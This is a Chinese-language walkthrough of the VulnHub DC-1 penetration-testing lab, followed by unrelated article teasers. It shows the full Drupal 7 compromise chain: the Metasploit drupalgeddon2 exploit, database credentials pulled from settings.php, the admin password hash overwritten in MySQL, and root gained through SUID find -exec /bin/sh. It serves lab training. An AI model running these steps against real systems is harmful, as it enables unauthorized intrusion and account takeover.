vulnhub通关-1 DC-1(含靶场资源)

一、环境搭建

1.环境描述

描述

描述:
DC-1 is a purposely built vulnerable lab for the purpose of gaining
experience in the world of penetration testing.

Dc-1是一个专门构建的易受攻击的实验室,目的是获得渗透测试领域的经验。

It was designed to be a challenge for beginners, but just how easy it
is will depend on your skills and knowledge, and your ability to
learn.

它被设计成对初学者的一个挑战,但是它有多简单取决于你的技能和知识,以及你的学习能力。

To successfully complete this challenge, you will require Linux
skills, familiarity with the Linux command line and experience with
basic penetration testing tools, such as the tools that can be found
on Kali Linux, or Parrot Security OS.

要成功完成这个挑战,您需要 Linux 技能、熟悉 Linux 命令行和基本渗透测试工具的经验,例如可以在 Kali Linux 或
Parrot Security OS 上找到的工具。

There are multiple ways of gaining root, however, I have included some
flags which contain clues for beginners.

有多种获得根的方法,但是,我已经包括了一些标志,其中包含初学者的线索。

There are five flags in total, but the ultimate goal is to find and
read the flag in root’s home directory. You don’t even need to be root
to do this, however, you will require root privileges.

总共有五个标志,但最终目标找到并读取 root 用户主目录中的标志。您甚至不需要成为 root 用户就可以做到这一点,但是,您需要
root 特权。

Depending on your skill level, you may be able to skip finding most of
these flags and go straight for root.

根据您的技能水平,您可以跳过查找大多数这些标志,直接访问 root 用户。

Beginners may encounter challenges that they have never come across
previously, but a Google search should be all that is required to
obtain the information required to complete this challenge.

初学者可能会遇到他们以前从未遇到过的挑战,但是 Google 搜索应该是完成这个挑战所需要的全部信息。

题目描述概括(目标)

共有五个flag,最终目标是找到root用户主目录中的flag。

2. 靶场下载

下载地址

https://www.vulnhub.com/entry/dc-1,292/

在这里插入图片描述

3.环境启动

1.解压文件
在这里插入图片描述
2.在VMware中打开ova文件
在这里插入图片描述
3.接下来选择你想导入的路径,进行导入即可
在这里插入图片描述
4.注意 遇到这种报错可以忽略,点击重试继续导入
在这里插入图片描述
5.开启DC-1后,显示出登录界面就证明环境基本搭建好了
在这里插入图片描述
6.网络设置,要与攻击机kali在同一网段,要么都用NAT模式,要么都用桥接模式(我这里用是是NAT模式)
在这里插入图片描述
在这里插入图片描述

二、渗透靶场

1.信息收集:寻找靶机IP

分析

NAT网段在192.168.1.0/24,所以扫描此网段

nmap扫描存活主机

nmap 192.168.1.0/24

在这里插入图片描述

扫描结果分析

扫描出5台存活主机
192.168.1.1 确定是VMnet8的IP
192.168.1.101 不确定
192.168.1.200 不确定
192.168.1.254 确定是网关
192.168.1.102 确定是本机kali的IP

图1 VMnet8
在这里插入图片描述
图2 网关
在这里插入图片描述

进过第一轮分析后还剩192.168.1.101和192.168.1.200 不确定
接下来进行ping测试

在这里插入图片描述

发现192.168.1.200是ping不通,那么确定192.168.1.101就是我们的靶机

2.信息收集:探测端口和服务

命令

nmap -A -p- -v 192.168.1.101

分析

-A:启用操作系统检测、版本检测、脚本扫描和路由追踪
-p-:扫描目标主机上的所有端口
-v:扫描过程中的详细输出

3.访问Web站点

发现是Drupal通用模板

在这里插入图片描述

再次查看nmap扫描结果,扫描到通用模板Drupal 7
在这里插入图片描述

4.MSF渗透

命令 作用:查找通用模板漏洞

MSF命令简介

msfconsole		进入MSF控制台
search 			搜索相应模块
use           	对应模块
show options  	查看信息
set RHOST  		远程主机ip
run           	攻击

搜索Drupal 7相关漏洞

searchsploit Drupal 7

在这里插入图片描述

进入msf

msfconsole

在这里插入图片描述

搜索Drupal框架漏洞

search Drupal

在这里插入图片描述

利用漏洞进行测试

这里用的是序号1的漏洞

use exploit/unix/webapp/drupal_drupalgeddon2

在这里插入图片描述

设置被攻击IP

set rhosts 192.168.1.101

在这里插入图片描述

运行此漏洞

run

在这里插入图片描述

进入shell

shell

在这里插入图片描述

查看当前权限

whoami

在这里插入图片描述

发现flag1

提示跟配置文件有关

在这里插入图片描述

发现flag4

根据环境描述,进入home目录查看,发现flag4 。flag4提示需要提升权限

在这里插入图片描述

发现flag2

根据flag1的提示查看配置文件
默认配置文件路径

/var/www/sites/default/settings.php
在这里插入图片描述
发现数据库登录用户名和密码

返回一个交互式shell

python -c ‘import pty;pty.spawn(“/bin/bash”)’

在这里插入图片描述

登入MySQL

在这里插入图片描述

查看数据库

在这里插入图片描述

查看用户表

在这里插入图片描述

置换密码

使用官网忘记密码方法

http://drupalchina.cn/node/2128

在站点路径下执行 php scripts/password-hash.sh 新密码
在这里插入图片描述
更新数据库密码

update users set pass=‘ S S SDHsT3m4kaiQiN.w7oV.pQ64f/Nw5o2DhDZtpR01Uc1.H3MPHWmJR’ where name=‘admin’;

在这里插入图片描述

登入Web站点

在这里插入图片描述

发现flag3

在这里插入图片描述
查看flag3的值:提示用find中的-exec提升权限

权限提升

查看 suid 权限的可执行二进制程序

find / -perm -4000 2>/dev/null

在这里插入图片描述

发现find命令

创建一个666文件让find来查找 在查找的过程中使用-exec携带whoami执行命令

find / -name 666 -exec "whoami" \;

在这里插入图片描述
进入shell程序,执行命令

find / -name 666 -exec "/bin/sh" \;
cd /root
ls

在这里插入图片描述

至此,恭喜你通过了本关卡!

三、相关资源

靶场下载:
https://www.vulnhub.com/entry/dc-1,292/

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mfbz.cn/a/335959.html

如若内容造成侵权/违法违规/事实不符,请联系我们进行投诉反馈qq邮箱809451989@qq.com,一经查实,立即删除!

相关文章

怎么移除WordPress后台工具栏的查看站点子菜单?如何改为一级菜单?

默认情况下,我们在WordPress后台想要访问前端网站,需要将鼠标移动到左上角的站点名称,然后点击下拉菜单中的“查看站点”才行,而且还不是新窗口打开。那么有没有办法将这个“查看站点”子菜单变成一级菜单并显示在顶部管理工具栏中…

Docker进阶篇-安装MySQL主从复制

一、MySQL主服务器 1、新建主服务器容器实例3307 docker run -p 3307:3306 \--name mysql-master \--privilegedtrue \-v /mydata/mysql-master/log:/var/log/mysql \-v /mydata/mysql-master/data:/var/lib/mysql \-v /mydata/mysql-master/conf:/etc/mysql \-e MYSQL_ROOT_…

超声波清洗机清洗眼镜有用吗?值得入手洗眼镜超声波清洗机推荐

眼镜党朋友长时间佩戴眼镜避免不了受到灰尘、污垢和细菌的侵扰,不清洗的话我们的视线就会被有所阻碍,为了保证我们眼镜的干净同时也是为了注意个人卫生,建议我们定期清洗一下眼镜,给眼镜洗个澡顺便消消毒,从一开始用水…

多分支机构大型企业如何高效运维管理?向日葵x金地商置案例分享

对于下设多个分支机构的,跨地区经营的大型企业来说,如何高效安全的实施IT运维是一个重要的课题;同时,分支机构之间如何实现高效的异地协同办公,并且在这一需求的基础上进一步强化管理,也是企业管理者需要认…

Ubuntu 22.04 安装MySql

MySQL是非常常用的关系型数据库,无论是大厂还是小厂,都有它的身影。最大的优点是免费,安装起来也比较简单。 MySQL的架构 画了个简图,描述了下MySQL的架构。 其中的比较有趣的点在于连接池和存储引擎。连接池缓存了数据库和客户端的TCP连接,以减少建立连接的开销。存储引…

第35集《佛法修学概要》

己四 、 精进度 分三:庚一、 精进自性。庚 二、趣入修习精进方便。 庚三、修习精进差别内容 请大家打开讲义第九十四页,我们看己四,精进度。 当我们从人天乘一个好人的阶段提升到一种菩萨道的修学,我们就要注意两个重点了。在我…

实验五 PLSQL编程

🕺作者: 主页 我的专栏C语言从0到1探秘C数据结构从0到1探秘Linux 😘欢迎关注:👍点赞🙌收藏✍️留言 🏇码字不易,你的👍点赞🙌收藏❤️关注对我真的很重要&…

Cmake 之Android库编译

一 检测库和执行程序能否在Android上用 1.1 我们知道Cmake不止能编译Linux库程序,也能编译出其它系统的库,如windows,ios和android等,那么上一篇生成的Linux的库程序能否直接用于Android上呢,下面先来做个测试。 1.2…

实验算法设计

文章目录 Unettransformer整体网络架构 Unet 可以用双线性差值替换,效果差不多,参数更少。 from typing import Dict import torch import torch.nn as nn import torch.nn.functional as F class DoubleConv(nn.Sequential):def __init__(self, in_cha…

interpret,一个超酷的 Python 库

更多资料获取 📚 个人网站:ipengtao.com 大家好,今天为大家分享一个超酷的 Python 库 - interpret。 Github地址:https://github.com/interpretml/interpret Python Interpret 是一个强大的开源工具,它为 Python 开发…

Crow:设置网站的index.html

对于一个网展来说,index.html是其第一个页面,也是根页面,如何通过Crow来加载index.html呢。 Crow:静态资源使用举例-CSDN博客 讲述了静态资源的使用,也就是通常存饭html,css,jpg文件的地方 当然index.html也会放在这个目录,但通常是放在static的根目录,其他资源会根据…

2.1.4-相关性分析

跳转到根目录:知行合一:投资篇 已完成: 1、投资&技术   1.1.1 投资-编程基础-numpy   1.1.2 投资-编程基础-pandas   1.2 金融数据处理   1.3 金融数据可视化 2、投资方法论   2.1.1 预期年化收益率   2.1.2 一个关于yaxb的…

vuex-跨模块访问

1. 场景 案例:跨模块访问和退出登录 假设我们有一个Vuex store,其中包含user模块和cart模块。当用户点击退出登录按钮时,我们需要调用user模块中的方法来清除用户信息,同时还需要清除cart模块中的购物车数据。 2. 实现-跨模块访…

air001研究笔记.基于arduino快速开发简单项目

一、air001芯片简介 air001是厂商合宙推出的一款tssop封装的mcu芯片。支持swd与串口烧录,多面向简单的功能简单类别的电子产品,因为官方文档齐全上手简易,所以也特别适合非专业爱好者乃至于幼儿编程。芯片内置资源:AIR001芯片数据…

国产AI新篇章:书生·浦语2.0带来200K超长上下文解决方案

总览:大模型技术的快速演进 自2023年7月6日“书生浦语”(InternLM)在世界人工智能大会上正式开源以来,其在社区和业界的影响力日益扩大。在过去半年中,大模型技术体系经历了快速的演进,特别是100K级别的长…

用LED数码显示器循环显示数字0~9

#include<reg51.h> // 包含51单片机寄存器定义的头文件 /************************************************** 函数功能&#xff1a;延时函数&#xff0c;延时一段时间 ***************************************************/ void delay(void) { unsigned …

Docker项目部署()

1.创建文件夹tools mkdir tools 配置阿里云 Docker Yum 源 : yum install - y yum - utils device - mapper - persistent - data lvm2 yum - config - manager -- add - repo http://mirrors.aliyun.com/docker- ce/linux/centos/docker - ce.repo 更新 yum 缓存 yum makec…

视频剪辑技巧:一键批量制作画中画视频的方法,高效提升剪辑任务

在数字媒体时代&#xff0c;视频剪辑已成为一项重要的技能。无论是专业的影视制作&#xff0c;还是日常的社交媒体分享&#xff0c;掌握视频剪辑技巧都能为内容增色不少。下面来看云炫AI智剪如何高效的剪辑视频技巧&#xff1a;一键批量制作画中画视频的方法&#xff0c;帮助您…

Vue3前端开发,provide和enject的基础练习,跨层级传递数据

Vue3前端开发,provide和enject的基础练习,跨层级传递数据&#xff01; 声明:provide虽然可以跨层级传递&#xff0c;但是依旧是需要由上向下的方向传递。根传子的方向。 <script setup> import {onMounted, ref} from vue import Base from ./components/Base.vue impor…

ssrf漏洞代码审计之douphp解析(超详细)

1.进入douphp的安装界面 www.douphp.com/install/ 由此可知安装界面已经被锁定了&#xff0c;但是由于install.lock是可控的&#xff0c;删除了install.lock后即可进行安装&#xff0c;所以我们现在的目的就是找到怎么去删除install.lock的方法。 要删除目标网站的任意文件&a…
最新文章